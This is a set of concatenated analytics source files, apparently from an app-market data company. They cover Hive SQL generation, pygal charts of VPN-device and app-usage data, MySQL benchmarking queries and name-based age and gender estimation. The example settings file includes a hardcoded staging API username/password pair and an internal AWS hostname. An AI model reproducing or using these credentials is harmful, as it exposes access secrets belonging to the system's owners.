while output.endswith('Rate exceeded') or output.endswith('Please try again after some time.'):
status, output = commands.getstatusoutput(cmd)
time.sleep(3)
return status, output
def generate_hive_file(hive_file_path, hive_file_name, params, t=None):
"""
Generate running sql file
"""
whole_path = os.path.join(hive_file_path, hive_file_name + '.sql')
hive_file_str = open(whole_path, 'r').read()
hive_file_str = replace_select_from_str(hive_file_str, params, t)
hive_file_str, output_path_list = replace_create_external_table_str(
hive_file_str, params, t)
timestamp = datetime.datetime.now().strftime('%s%f')
output_file_path = os.path.join(
hive_file_path, '%s_%s.sql' % (hive_file_name, timestamp)
)
f = open(output_file_path, 'w')
f.write(hive_file_str)
f.close()
return output_file_path, output_path_list
def replace_select_from_str(hive_file_str, params, t=None):
"""
Replace SELECT * FROM tbl_name code in hive SQL with real
CREATE, SELECT and DROP sentences.
"""
schema_list = re.findall((
'(INSERT[^;]+?TABLE[^;]+?([^ ;]+)[^;]+?FROM[^a-zA-Z0-9]+?###([^;]+?)###'
'[^;]*?;)'),
hive_file_str, re.DOTALL)
for sentence, tbl_name, schema_name in set(schema_list):
schema = load_schema(schema_name.split(':')[0])
# Add initial CREATE TABLE sentence.
loc_str, schemas = LOAD_STR_FUNC_MAPPING[schema['type']](
schema, t).split('AS')
schemas = _replace_pig_schema_to_hive(schemas)
partitions = schema.get('hive_partitions')
split_partitions = _split_partitions(partitions)
init_create_sentence = (
'CREATE TABLE IF NOT EXISTS {tbl_name} {schema}{partition};'
).format(
tbl_name=tbl_name, schema=schemas,
partition=' PARTITIONED BY ({})'.format(
partitions.replace(':', ' ')) if partitions else '')
replace_list = [init_create_sentence]
date_range = replace_params(determine_load_time_range(
schema_name, schema['table'], params
).rstrip('}').lstrip('{'), params).split(',')
for date in date_range:
params.update({'date': date})
# Add CREATE EXTERNAL TABLE sentence before INSERT
replaced_loc_str = loc_str.replace('$date/$hour', date).strip()
replaced_loc_str = replaced_loc_str.replace('$date', date)
if split_partitions:
replaced_loc_str = '\'{}/{}\''.format(
replaced_loc_str.strip('\''),
'/'.join(split_partitions).replace('\'', ''))
replaced_loc_str = replace_params(replaced_loc_str, params)
create_sentence = (
"CREATE EXTERNAL TABLE IF NOT EXISTS {tbl_name}_\n"
" {schema}\n"
" ROW FORMAT {row_format}\n"
" FIELDS TERMINATED BY '{fields_sep}'\n"
" LINES TERMINATED BY '{lines_sep}'\n"
" STORED AS {storage} \n"
" LOCATION {location};"
).format(
tbl_name=tbl_name,
schema=schemas,
row_format=schema.get('hive_row_format') or 'DELIMITED',
fields_sep=schema.get('hive_fields_delimiter') or r'\t',
lines_sep=schema.get('hive_lines_delimiter') or r'\n',
storage=schema.get('hive_storage_format') or 'TEXTFILE',
location=replaced_loc_str)
create_sentence = re.sub(' +', ' ', create_sentence)
# Add INSERT sentence
if split_partitions:
insert_sentence = sentence.replace(
tbl_name, '{} PARTITION ({})'.format(
tbl_name, ','.join(split_partitions))
).replace(
r'###{}###'.format(schema_name), '{}_'.format(tbl_name))
else:
insert_sentence = sentence.replace(
r'###{}###'.format(schema_name), '{}_'.format(tbl_name))
insert_sentence = replace_params(insert_sentence, params)
# Add DROP sentence.
drop_sentence = 'DROP TABLE IF EXISTS {}_;'.format(tbl_name)
replace_list += [
drop_sentence, create_sentence, insert_sentence, drop_sentence]
hive_file_str = hive_file_str.replace(sentence, '\n'.join(replace_list))
return hive_file_str
def _replace_pig_schema_to_hive(schema):
result = schema.lower().strip()
pig_to_hive_data_type_mapping = {
'chararray': 'STRING',
'int': 'BIGINT',
'long': 'BIGINT',
'float': 'DECIMAL',
'double': 'DECIMAL'
}
for k, v in pig_to_hive_data_type_mapping.iteritems():
result = result.replace(k, v)
return result.replace(':', ' ')
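# e.g. _replace_pig_schema_to_hive('(name:chararray, cnt:long)')
#      -> '(name STRING, cnt BIGINT)'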
def _split_partitions(partitions_str):
if not partitions_str:
return None
cols = [col.strip().split(':') for col in partitions_str.split(',')]
return map(lambda col: '{n}=${n}'.format(n=col[0])
if col[1].upper() in ('BIGINT', 'DOUBLE', 'DECIMAL')
else '{n}=\'${n}\''.format(n=col[0]), cols)
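# e.g. _split_partitions('date:string,country:string')
#      -> ["date='$date'", "country='$country'"]
# (numeric partition types BIGINT/DOUBLE/DECIMAL get unquoted '$name' placeholders)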
def replace_create_external_table_str(hive_file_str, params, t=None):
"""
Replace CREATE EXTERNAL TABLE code in hive SQL with real SQL sentences.
"""
def _replace_path_str(loc_str, partitions):
"""
Replace partition directories in location string
"""
if not partitions:
return loc_str
partitions_name = map(
lambda x: x[0].strip(),
[partition.split(':') for partition in partitions.split(',')])
loc_directories = loc_str.strip("'").split('/')
start_replace_id = len(loc_directories)
for id in xrange(1, start_replace_id):
has_replaced = False
for partition_name in partitions_name:
if loc_directories[id] == '$' + partition_name:
has_replaced = True
break
if has_replaced:
break
return "'{}'".format('/'.join(loc_directories[:id])) if has_replaced \
else loc_str
schema_list = re.findall(
r'CREATE[^;]+?TABLE[^;]+?([^ ;]+) +###([^;]+?)###[^;]*?;',
hive_file_str, re.DOTALL)
output_path_list = []
for tbl_name, schema_name in set(schema_list):
schema = load_schema(schema_name)
loc_str, schemas = [
s.strip() for s in LOAD_STR_FUNC_MAPPING[schema['type']](schema, t)
.split('AS')]
loc_str = loc_str.replace('$input_root_dir', '$output_root_dir')
schemas = _replace_pig_schema_to_hive(schemas)
partitions = schema.get('hive_partitions')
root_loc = _replace_path_str(loc_str, partitions)
schema_str = (
"\n {schema}\n"
"{partition}"
" ROW FORMAT {row_format}\n"
" FIELDS TERMINATED BY '{fields_sep}'\n"
" LINES TERMINATED BY '{lines_sep}'\n"
" STORED AS {storage}\n"
" LOCATION {location}"
).format(
schema=schemas,
partition=' PARTITIONED BY ({})\n'.format(
partitions.replace(':', ' ')) if partitions else '',
row_format=schema.get('hive_row_format') or 'DELIMITED',
fields_sep=schema.get('hive_fields_delimiter') or r'\t',
lines_sep=schema.get('hive_lines_delimiter') or r'\n',
storage=schema.get('hive_storage_format') or 'TEXTFILE',
location=root_loc)
if partitions:
schema_str += (
";\nALTER TABLE {tbl_name} DROP IF EXISTS "
"PARTITION ({partition});\n"
"ALTER TABLE {tbl_name} ADD IF NOT EXISTS "
"PARTITION ({partition}) LOCATION {loc}"
).format(
tbl_name=tbl_name,
partition=','.join(_split_partitions(partitions)),
loc=loc_str)
schema_str = replace_params(schema_str, params)
hive_file_str = hive_file_str.replace(
r'###{}###'.format(schema_name), re.sub(' +', ' ', schema_str))
output_path_list.append(loc_str)
return hive_file_str, output_path_list
<file_sep>/datathon/visualizations/main.py
import pygal
import pandas as pd
import pygal_maps_world
from flask import Flask, Response , render_template
app = Flask(__name__ , static_url_path='')
@app.route('/')
def index():
""" render svg figures on html """
return render_template('index.html')
@app.route('/worldmap_scale/')
def worldmap_scale():
""" read data """
map_data = pd.read_csv("map_data.csv", names=['country', 'value'], header=None)
""" render svg graph """
worldmap_chart = pygal.maps.world.World()
worldmap_chart.title = 'Number of VPN connected devices by country \n 01-05-2015 -- 31-05-2015'
worldmap_chart.add('#devices', dict(zip(map_data.country.astype(str),map_data.value)))
return Response(response=worldmap_chart.render(), content_type='image/svg+xml')
@app.route('/worldmap/')
def worldmap():
""" read data """
map_data = pd.read_csv("map_data.csv", names=['country', 'value'], header=None)
""" render svg graph """
wmp = pygal.maps.world.World()
wmp.title = 'Number of VPN connected devices by country \n 01-05-2015 -- 31-05-2015'
thresh1 = 100000
wmp.add(">=100k",dict(zip(map_data[map_data.value >= thresh1].country.astype(str), map_data[map_data.value >= thresh1].value)))
thresh2 = 50000
wmp.add("50k - 100k",dict(zip(map_data[(map_data.value >= thresh2) & (map_data.value < thresh1)].country.astype(str),
map_data[(map_data.value >= thresh2) & (map_data.value < thresh1)].value)))
thresh3 = 10000
wmp.add("10k - 50k",dict(zip(map_data[(map_data.value >= thresh3) & (map_data.value < thresh2)].country.astype(str),
map_data[(map_data.value >= thresh3) & (map_data.value < thresh2)].value)))
thresh4 = 5000
wmp.add("5k - 10k",dict(zip(map_data[(map_data.value >= thresh4) & (map_data.value < thresh3)].country.astype(str),
map_data[(map_data.value >= thresh4) & (map_data.value < thresh3)].value)))
thresh5 = 1000
wmp.add("1k - 5k",dict(zip(map_data[(map_data.value >= thresh5) & (map_data.value < thresh4)].country.astype(str),
map_data[(map_data.value >= thresh5) & (map_data.value < thresh4)].value)))
wmp.add("<1k",dict(zip(map_data[(map_data.value < thresh5)].country.astype(str), map_data[map_data.value < thresh3].value)))
return Response(response=wmp.render(), content_type='image/svg+xml')
from pygal.style import DarkGreenStyle
@app.route('/piechart/')
def piechart():
pie_data = pd.read_csv("pie_data.csv", names=['app_name', 'counts'], header=None)
pie_chart = pygal.Pie(style=DarkGreenStyle)
pie_chart.title = 'App usage in AE'
for index, row in pie_data.iterrows():
pie_chart.add(row['app_name'], row['counts'])
return Response(response=pie_chart.render(), content_type='image/svg+xml')
from pygal.style import DarkColorizedStyle, LightenStyle
@app.route('/linechart/')
def linechart():
line_data = pd.read_csv("line_data.csv", names=['labels', 'WhatsApp', 'Netflix', 'Safari', 'Facebook'], header=None)
line_chart = pygal.Line(style=DarkColorizedStyle)
dark_lighten_style = LightenStyle('#336676', base_style=DarkColorizedStyle)
line_chart.title = 'App usage in AE \n 01-05-2015 -- 11-05-2015 '
line_chart.x_labels = map(str,line_data['labels'])
line_chart.add('WhatsApp',line_data.WhatsApp)
line_chart.add('Netflix', line_data.Netflix)
line_chart.add('Safari', line_data.Safari)
line_chart.add('Facebook', line_data.Facebook)
return Response(response=line_chart.render(), content_type='image/svg+xml')
from pygal.style import NeonStyle
@app.route('/scatterplot/')
def scatterplot():
scatterplot_data = pd.read_csv("app_duration.csv",names=['app_name','US','AE'])
xy_chart = pygal.XY(stroke=False,style=NeonStyle)
xy_chart.title = 'App duration comparison US and AE'
xy_chart.add('Facebook', [(0, 0), (.1, .2), (.3, .1), (.5, 1), (.8, .6), (1, 1.08), (1.3, 1.1), (2, 3.23), (2.43, 2)])
xy_chart.add('Safari', [(.1, .15), (.12, .23), (.4, .3), (.6, .4), (.21, .21), (.5, .3), (.6, .8), (.7, .8)])
xy_chart.add('Netflix', [(.05, .01), (.13, .02), (1.5, 1.7), (1.52, 1.6), (1.8, 1.63), (1.5, 1.82), (1.7, 1.23), (2.1, 2.23), (2.3, 1.98)])
return Response(response=xy_chart.render(), content_type='image/svg+xml')
@app.route('/scatterplot_alter/')
def scatterplot_alter():  # distinct name: Flask derives the endpoint from the view function name
scatterplot_data = pd.read_csv("app_duration.csv",names=['app_name','US','AE'])
xy_chart = pygal.XY(stroke=False,style=NeonStyle)
xy_chart.title = 'App duration comparison US and AE'
xy_chart.add('Facebook', [(0, 0), (.1, .2), (.3, .1), (.5, 1), (.8, .6), (1, 1.08), (1.3, 1.1), (2, 3.23), (2.43, 2)])
xy_chart.add('Safari', [(.1, .15), (.12, .23), (.4, .3), (.6, .4), (.21, .21), (.5, .3), (.6, .8), (.7, .8)])
xy_chart.add('Netflix', [(.05, .01), (.13, .02), (1.5, 1.7), (1.52, 1.6), (1.8, 1.63), (1.5, 1.82), (1.7, 1.23), (2.1, 2.23), (2.3, 1.98)])
return Response(response=xy_chart.render(), content_type='image/svg+xml')
if __name__ == '__main__':
app.config['DEBUG'] = True
app.run('0.0.0.0',5000)
<file_sep>/int-vs-m-benchmark/sql/android/1001i3-store_actuals.sql
/*
Store the actuals for the downloads and the revenue.
*/
-- Collect downloads and revenue. --
DROP TEMPORARY TABLE IF EXISTS temp.downloads_temp;
CREATE TEMPORARY TABLE temp.downloads_temp (
app_id integer NOT NULL,
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
units integer NOT NULL,
PRIMARY KEY (`store_id`, `date`, `app_id`, `feed`)
)
SELECT
d.application_id as app_id,
date,
fdtm.feed,
cnm.store_id,
d.real_value AS units
FROM
temp.application_data d
JOIN aa_benchmarking_android.feed_device_type_mappings fdtm
USING (type)
JOIN aa_benchmarking_android.country_mappings cnm
USING (country_id)
WHERE
real_value IS NOT NULL
AND type IN ('paid', 'free')
GROUP BY
d.date,
fdtm.feed,
cnm.store_id,
d.application_id;
DROP TEMPORARY TABLE IF EXISTS temp.sales_temp;
CREATE TEMPORARY TABLE temp.sales_temp(
app_id integer NOT NULL,
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
revenue INT,
PRIMARY KEY (`store_id`, `date`, `app_id`, `feed`)
)
SELECT
d.application_id as app_id,
date,
cnm.store_id,
fdtm.feed,
d.real_value AS revenue
FROM
temp.application_data d
JOIN aa_benchmarking_android.feed_device_type_mappings fdtm
USING (type)
JOIN aa_benchmarking_android.country_mappings cnm
USING (country_id)
WHERE
real_value IS NOT NULL
AND type IN ('gross')
GROUP BY
d.date,
fdtm.feed,
cnm.store_id,
d.application_id;
-- Remove values already present for generated stores and days.
DELETE
r.*
FROM
aa_benchmarking_android.downloads r
JOIN temp.downloads_temp t
USING (store_id, date);
DELETE
r.*
FROM
aa_benchmarking_android.sales r
JOIN temp.sales_temp t
USING (store_id, date);
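-- Deleting before inserting keeps reruns idempotent: every (store_id, date)
-- present in the temp tables is replaced rather than duplicated.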
-- Insert new values.
INSERT INTO aa_benchmarking_android.downloads
SELECT
t.app_id,
t.date,
t.store_id,
t.feed,
t.units
FROM
temp.downloads_temp t;
INSERT INTO aa_benchmarking_android.sales
SELECT
t.app_id,
t.date,
t.store_id,
t.feed,
t.revenue
FROM
temp.sales_temp t;
<file_sep>/evaluation/py/get_daily_weights_quality.py
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
import numpy as np
from collections import defaultdict
def main():
estreal_daily_sbe = sys.argv[1]
app_daily_weights = sys.argv[2]
output_dir = sys.argv[3]
input_files = _listdir_with_fullpath(estreal_daily_sbe) + _listdir_with_fullpath(app_daily_weights)
input_files = filter(lambda s: s.endswith('.csv'), input_files)
g = _group_same_filenames(input_files)
for (group_name, files) in g:
# They have to be pair.
if len(files) != 2:
continue
df = _merge_sbe_and_weights(map(pd.read_csv, files))
daily_quality = _get_daily_sbe_error(df)
# _get_daily_sbe_error already returns distinct column names; no rename needed here.
daily_quality.to_csv(os.path.join(output_dir, group_name), index=False)
def _get_daily_sbe_error(df):
def daily_over20_error(x):
return np.sum(x > 0.2) / float(len(x))
df['daily_sbe_error'] = (df['estimate'] - df['units']).abs() / df['units'].astype(float)
df['daily_sbe_weighted_error'] = df['daily_sbe_error'] * df['daily_weights']
grouped_error = df.groupby('app_id')['daily_sbe_error'].aggregate([pd.Series.mean, daily_over20_error])
grouped_error.rename(columns={'mean': 'daily_sbe_error_mean',
'daily_over20_error': 'daily_sbe_over20_error'},
inplace=True)
grouped_weighted_error = df.groupby('app_id')['daily_sbe_weighted_error'].aggregate([pd.Series.mean, daily_over20_error])
grouped_weighted_error.rename(columns={'mean': 'daily_sbe_weighted_error_mean',
'daily_over20_error': 'daily_sbe_weighted_over20_error'},
inplace=True)
# reset_index() so that app_id is a real column before merging on it
grouped = pd.merge(grouped_error.reset_index(), grouped_weighted_error.reset_index(), on=['app_id'], how='inner')
return grouped
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _group_same_filenames(paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in paths:
d[os.path.basename(s)].append(s)
return d.iteritems()
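# e.g. ['est/US_ios.csv', 'weights/US_ios.csv'] (illustrative paths) groups to
#      {'US_ios.csv': ['est/US_ios.csv', 'weights/US_ios.csv']}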
def _merge_sbe_and_weights(dfs):
# @note: Use inner join, because we only care the case where we have
# estimation and real values.
merged = pd.merge(*dfs, on=['app_id', 'date'], how='inner')
return merged.sort_index(by=['date'])
if __name__ == '__main__':
main()
<file_sep>/audience/name_vs_age_gender/lib/name_statistics.py
import glob
import numpy as np
import os
import pandas as pd
import requests
from bs4 import BeautifulSoup
COHORT_LIFE_TABLE_URL = "http://www.ssa.gov/oact/NOTES/as120/LifeTables_Tbl_7_{decade}.html"
AGE_BINS = ['14-17', '18-24', '25-34', '35-44', '45-54', '55+']
AGE_BOUNDARIES = np.array([14, 18, 25, 35, 45, 55, 100])
def download_birth_data():
"""
Download births data.
"""
os.system("wget http://www.ssa.gov/oact/babynames/names.zip -P data")
os.system("unzip data/names.zip -d data/")
def load_births(data_paths=None):
"""
Load births data.
:param data_paths: List with paths to yearly births files
:returns DataFrame with birth statistics
"""
if data_paths is None:
data_paths = glob.glob('data/*.txt')
births = pd.concat([_load_year_births(file_path) for file_path in data_paths])
births.sort(['year', 'gender', 'n_born'], ascending=[True, True, False],
inplace=True)
return births
def _load_year_births(file_path):
"""
Load births for a year.
:param file_path: Path to file to load
:return DataFrame with birth statistics a year
"""
year = file_path[8:12]  # relies on the SSA naming convention 'data/yobYYYY.txt'
year_births = pd.read_csv(file_path, names=['name', 'gender', 'n_born'])
year_births['year'] = int(year)
return year_births
def get_survival_rates(year=2014, yearly_survival_rates=None):
"""
Get survival rates for ages in a given year.
:param year: Year
:param yearly_survival_rates: DataFrame with yearly survival rates
:returns DataFrame with survival rates
"""
if yearly_survival_rates is None:
yearly_survival_rates = get_yearly_survival_rates()
survival_rates = yearly_survival_rates[(yearly_survival_rates.year +
yearly_survival_rates.age) == year]
return survival_rates
def get_yearly_survival_rates(begin_decade=1920, end_decade=2020):
"""
Get yearly survival rates.
:param begin_decade: Begin decade
:param end_decade: End decade
:returns DataFrame with yearly survival rates
"""
decennial_survival = pd.concat([_get_decennial_survival_rates(decade)
for decade in np.arange(begin_decade,
end_decade + 10, 10)])
min_year = decennial_survival.decade.min()
max_year = decennial_survival.decade.max()
yearly_index = np.arange(min_year, max_year + 1)
yearly_survival = pd.concat([_resample_survival_rates(group, yearly_index) for key, group
in decennial_survival.groupby(['age', 'gender'])])
return yearly_survival
def _get_decennial_survival_rates(decade, cohort_life_table_url=COHORT_LIFE_TABLE_URL):
"""
Get survival rates for a given decade.
:param decade: Decade
:param cohort_life_table_url: URL to retrieve cohort table from
:returns DataFrame with survival rates of ages for a given decade
"""
table_url = cohort_life_table_url.format(decade=str(decade))
cohort_table = _download_cohort_table(table_url)
survival_rates = _process_cohort_table(cohort_table)
survival_rates['decade'] = float(decade)
return survival_rates
def _download_cohort_table(cohort_table_url):
"""
Download cohort table and convert to DataFrame.
:param cohort_table_url: URL to retrieve cohort table from
:returns DataFrame with cohort data
"""
soup = BeautifulSoup(requests.get(cohort_table_url).text)
raw_table = soup.findAll('table')[1]
raw_table = [[cell.getText().strip() for cell in row.findAll(['tr2', 'td'])]
for row in raw_table.findAll('tr') if len(row) > 0]
raw_table = [[cell if len(cell) > 0 else np.nan for cell in row]
for row in raw_table]
cohort_table = pd.DataFrame(raw_table)
return cohort_table
def _process_cohort_table(cohort_table, population_size=100000.):
"""
Process the cohort table and compute survival rates.
:param cohort_table: Downloaded cohort table
:param population_size: Population size used by SSA
:returns DataFrame with survival rates for given age and gender
"""
temp_df = cohort_table.dropna(axis=0, how='all').dropna(axis=1, how='all')[[0, 2, 10]]
temp_df.columns = ['age', 'M', 'F']
temp_df['age'] = temp_df.age.astype(float)
temp_df[['M', 'F']] = temp_df[['M', 'F']].applymap(lambda x: float(x.replace(',', '')))
survival = pd.melt(temp_df, id_vars=['age'], value_vars=['M', 'F'])
survival.rename(columns={'variable': 'gender', 'value': 'rate'},
inplace=True)
survival['rate'] = survival.rate / population_size
return survival
def _resample_survival_rates(decennial_survival, yearly_index):
"""
Generate resampled survival rates from decennial rates.
:param decennial_survival: DataFrame with decennial survival rates
:param yearly_index: Index to use for resampling
"""
reindexed_df = decennial_survival.set_index('decade').reindex(yearly_index)
resampled_df = reindexed_df.interpolate()
resampled_df['gender'] = decennial_survival.gender.iloc[0]
resampled_df.reset_index(inplace=True)
resampled_df.rename(columns={'decade': 'year'}, inplace=True)
return resampled_df
def combine_name_statistics(births, survival_rates):
"""
Combine births with survival rates.
:param births: Birth counts
:param survival_rates: Survival rates for a given year
:returns DataFrame with name statistics
"""
name_statistics = pd.merge(births, survival_rates, on=['gender', 'year'])
name_statistics['n_born_and_alive'] = np.round(name_statistics.rate * name_statistics.n_born)
name_statistics.sort(['gender', 'year', 'name'], inplace=True)
return name_statistics
def compute_binned_distributions(name_statistics, age_bins=AGE_BINS, age_boundaries=AGE_BOUNDARIES):
"""
Compute binned distributions for age and gender.
:param name_statistics: DataFrame with name statistics (see combine_name_statistics)
:param age_bins: Labels for age bins (parameter labels for pandas.cut)
:param age_boundaries: Boundaries for the age bins (parameter bins for pandas.cut)
:return: DataFrame with aggregated distributions for age and gender.
Note: Throws away any interactions between age and gender (i.e. information on age given gender and vice versa).
"""
name_statistics['age_bin'] = pd.cut(name_statistics['age'], bins=age_boundaries, right=False, labels=age_bins)
name_statistics = name_statistics[name_statistics.age_bin.notnull()]
gender = _compute_fraction_male(name_statistics)
age = _compute_age_distribution(name_statistics)
return pd.concat([gender['fraction_male'], age], axis=1)
def _compute_fraction_male(name_statistics):
"""
Compute the fraction of males for each name.
:param name_statistics: DataFrame with name statistics (see combine_name_statistics)
:return: DataFrame with fraction of males per name
"""
gender = pd.pivot_table(name_statistics, index='name', columns='gender', values='n_born_and_alive',
aggfunc=sum, fill_value=0)
gender['total'] = gender.sum(axis=1)
gender['fraction_male'] = gender.M * 1. / gender.total
return gender
def _compute_age_distribution(name_statistics):
"""
Compute the binned age distribution for each name.
:param name_statistics: DataFrame with name statistics (see combine_name_statistics)
:return: DataFrame with binned age distributions per name
"""
age = pd.pivot_table(name_statistics, index='name', columns='age_bin', values='n_born_and_alive',
aggfunc=sum, fill_value=0)
age['total'] = age.sum(axis=1)
age = age[age.total > 0]
age_bins = name_statistics.age_bin.unique()
for current_bin in age_bins:
age[current_bin] = age[current_bin] * 1. / age['total']
return age
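# Minimal end-to-end sketch (assumes the SSA data was downloaded to the default
# paths; see download_birth_data):
#
#   births = load_births()
#   survival_rates = get_survival_rates(year=2014)
#   stats = combine_name_statistics(births, survival_rates)
#   distributions = compute_binned_distributions(stats)
#   # -> one row per name: 'fraction_male' plus one share column per age bin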
<file_sep>/top-app-stability/Distimo_data_queries/Android_calculate_mapd.sql
DROP TABLE IF EXISTS temp.market_stability_mapd;
CREATE TABLE temp.market_stability_mapd
select
'android' as platform,
a.iso_code,
a.feed,
a.start_date,
CASE
WHEN a.rank = 1 THEN '1'
WHEN a.rank >=2 and a.rank <= 5 THEN '2-5'
WHEN a.rank >=6 and a.rank <= 15 THEN '6-15'
ELSE '16-50'
END as rank_bucket,
avg(abs((a.estimate - b.estimate) / b.estimate)) as mapd
from
aa_benchmarking_android.stability_weekly_aggregated a
join aa_benchmarking_android.stability_weekly_aggregated b on
a.feed = b.feed and a.start_date = date_add(b.start_date, interval 1 week) and a.rank = b.rank and a.iso_code = b.iso_code
group by
iso_code, feed, start_date, rank_bucket
;
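-- NOTE: these android rows go into the shared aa_benchmarking_ios.stability_mapd
-- table; the 'platform' column set above is what distinguishes them from iOS rows.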
insert into aa_benchmarking_ios.stability_mapd
select
*
from
temp.market_stability_mapd
;
<file_sep>/top-app-stability/Distimo_data_queries/iOS_estimates_per_week.sql
DROP TEMPORARY TABLE IF EXISTS temp.weeks;
CREATE TEMPORARY TABLE temp.weeks
(CONSTRAINT PRIMARY KEY (date, start_date))
SELECT
adddate(date, INTERVAL 1 DAY) as date,
adddate(date, INTERVAL 1-DAYOFWEEK(date) DAY) as start_date
FROM
estimates.application_data_appstore
WHERE
date >= '2014-09-28' and date <= '2014-10-04'
GROUP BY date;
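-- The statement below ranks apps per (week, appstore instance, feed) using the
-- MySQL session-variable idiom: @prev holds the current group key and @rank
-- increments within it, resetting to 1 whenever the key changes. The one-day
-- shift applied to `date` above presumably aligns ranking dates with the
-- estimate dates they are based on.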
DROP temporary table IF EXISTS temp.ios_top_est;
CREATE temporary TABLE temp.ios_top_est
(CONSTRAINT PRIMARY KEY (start_date,iso_code,feed,rank))
SELECT
start_date,
cn.iso_code,
CONCAT(IF(ai.device_id=1, 'iphone_', 'ipad_'), IF(x1.type='gross','revenue',x1.type)) as feed,
rank,
estimate
FROM (
SELECT
start_date,
appstore_instance_id,
type,
estimate,
IF(
(@prev=CONCAT('1','-',x.start_date,'-',x.appstore_instance_id,'-',x.type)),
@rank:=@rank+1,
((@prev:=CONCAT('1','-',x.start_date,'-',x.appstore_instance_id,'-',x.type)) AND (@rank:=1))
) AS rank
FROM(
SELECT
w.start_date,
e.appstore_instance_id,
e.application_id,
e.type,
sum(e.estimate) as estimate
FROM
estimates.application_data_appstore e
JOIN temp.weeks w
ON w.date = e.date
GROUP BY w.start_date, appstore_instance_id,application_id, type
ORDER BY w.start_date, appstore_instance_id, type, estimate DESC
) x, (SELECT @rank:=1, @prev:='') dummy
) x1
JOIN appstore.appstore_instances ai
ON ai.id = x1.appstore_instance_id
JOIN appstore.countries cn
ON cn.id = ai.country_id
WHERE rank <= 50;
INSERT INTO aa_benchmarking_ios.stability_weekly_aggregated
select
*
from
temp.ios_top_est;
<file_sep>/aa_au_model/hive_scripts/workflow/conf/settings_example.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
TEST = False
ENV = 'staging'
AMR_SERVICE_ADDRESS = 'xxx'
HDFS_MNT_PREFIX = '/mnt/hdfs'
HDFS_ROOT_PATH = '/user/aardvark'
HBASE_THRIFT_HOST = 'localhost'
STREAMING_JAR = '/usr/lib/hadoop-0.20-mapreduce/contrib/streaming/hadoop-streaming-2.0.0-mr1-cdh4.5.0.jar'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
EMR_KEY_PAIR_FILE = '/home/aardvark/id_rsa_emr.pem'
PG_DB_USER = 'aa'
PG_DB_PASSWD = ''
PG_DB_HOST = 'localhost'
PG_DB_PORT = 5432
PG_DB_NAME_A = 'aa'
PG_DB_NAME_B = 'bb'
KPI_PG_DB_USER = 'aa'
KPI_PG_DB_PASSWD = ''
KPI_PG_DB_HOST = 'localhost'
KPI_PG_DB_PORT = 5432
KPI_PG_DB_NAME = 'aa'
APPANNIE_API_KEY = 'XXXXX'
WORKFLOW_LOG_PATH = ''
VPN_RADIUS_DB_HOST = 'localhost'
VPN_RADIUS_DB_PORT = 5432
VPN_RADIUS_DB_USER = 'root'
VPN_RADIUS_DB_PWD = '<PASSWORD>'
VPN_RADIUS_DB_USERINFO = 'radius'
API_HOST = 'https://report-stg.smart-sense.org'
API_AUTH = ('a8k', 'a8k4u')
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
S3_BIG_UPLOAD_BUCKET = ''
ZK_HOST = ''
ZK_PORT = ''
VPN_DEVICE_INFO_DB_HOST = ''
VPN_DEVICE_INFO_DB_PORT = 5432
VPN_DEVICE_INFO_DB_USER = ''
VPN_DEVICE_INFO_DB_PWD = ''
VPN_DEVICE_INFO_DB_USERINFO = ''
VPN_LOGIN_INFO_DB_HOST = ''
VPN_LOGIN_INFO_DB_PORT = 5432
VPN_LOGIN_INFO_DB_USER = ''
VPN_LOGIN_INFO_DB_PWD = ''
VPN_LOGIN_INFO_DB_USERINFO = ''
VPN_STATS_DB_HOST = ''
VPN_STATS_DB_PORT = 5432
VPN_STATS_DB_USER = ''
VPN_STATS_DB_PWD = ''
VPN_STATS_DB_USERINFO = ''
DPI_RESULT_S3_BUCKET = 'aardvark-stg-ds-sample'
DPI_RESULT_S3_ACCESS_KEY = 'XXXX'
DPI_RESULT_S3_SECRET_KEY = 'XXX'
DATA_S3_BUCKET = 'aardvark-stg-data'
DATA_INT_S3_BUCKET = ''
VPN_SOURCE_S3_BUCKET = ''
INT_ETL_NOTIFY_SQS_QUEUE_NAME = ''
INT_ETL_NOTIFY_ACCESS_KEY = ''
INT_ETL_NOTIFY_SECRET_KEY = ''
INT_ETL_NOTIFY_REGION = ''
USER_NAME_FOR_OPEN_TSDB = ''
PWD_FOR_OPEN_TSDB = ''
URL_FOR_OPEN_TSDB_GET = ''
URL_FOR_OPEN_TSDB_POST = ''
APP_ANNIE_IP_SERVICE = 'http://internal-prod-serv-elb-1907643352.us-west-2.elb.amazonaws.com/2015-01-30/'
ADX_CONFIG = {
    'username': 'username',
    'password': '<PASSWORD>',
    'host': 'host',
    'parse_networks': [],
    'IGNORE_CREATIVES': []
}
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
from nltk.corpus import wordnet
from collections import defaultdict
from nltk import NaiveBayesClassifier
from nltk.tokenize import wordpunct_tokenize
import pandas as pd
import nltk
import numpy as np
from unidecode import unidecode
import random
import re
from nltk.corpus import stopwords
import collections
import psycopg2
import argparse
from guess_language import guess_language
import cStringIO
import StringIO
import os
import sys
SEP = '\t'
DATA_DIR = '/home/rafael/appannie/data/demie'
def guess_lang(text):
try:
return guess_language(text.decode('utf-8'))
except:
return 'UNKNOWN'
def r(df):
for idx, row in df.iterrows():
yield SEP.join(map(str, row))
def get_p_male_from_name(reviewer, name_gender_classifier, clean_name_set):
tokens = str(reviewer).strip()
tokens = unidecode(tokens.decode('utf-8', 'replace'))
pattern2 = r'''\s|[A-Z][a-z]*|[a-z]*|[+/\-@&*_]'''
tokens = nltk.regexp_tokenize(tokens, pattern2)
tokens = [element.lower() for element in tokens]
tokens = set(tokens)
tokens = tokens.intersection(clean_name_set)
p_male_by_name = -1.0
if len(tokens)>0:
p_male_by_name = get_male_probability_byName(tokens, name_gender_classifier)
p_male_by_name = get_highest_probability(p_male_by_name)
return p_male_by_name
def read_reviews(store_id, cur):
sql = 'SELECT reviewer, text, title FROM aa_review WHERE reviewer!=%s AND store_id=%s ORDER BY reviewer limit 10001'
params = ('', store_id)
print cur.mogrify(sql, params)
cur.execute(sql, params)
for reviewer, text, title in cur:
yield {'reviewer': reviewer, 'review': '. '.join((title, text))}
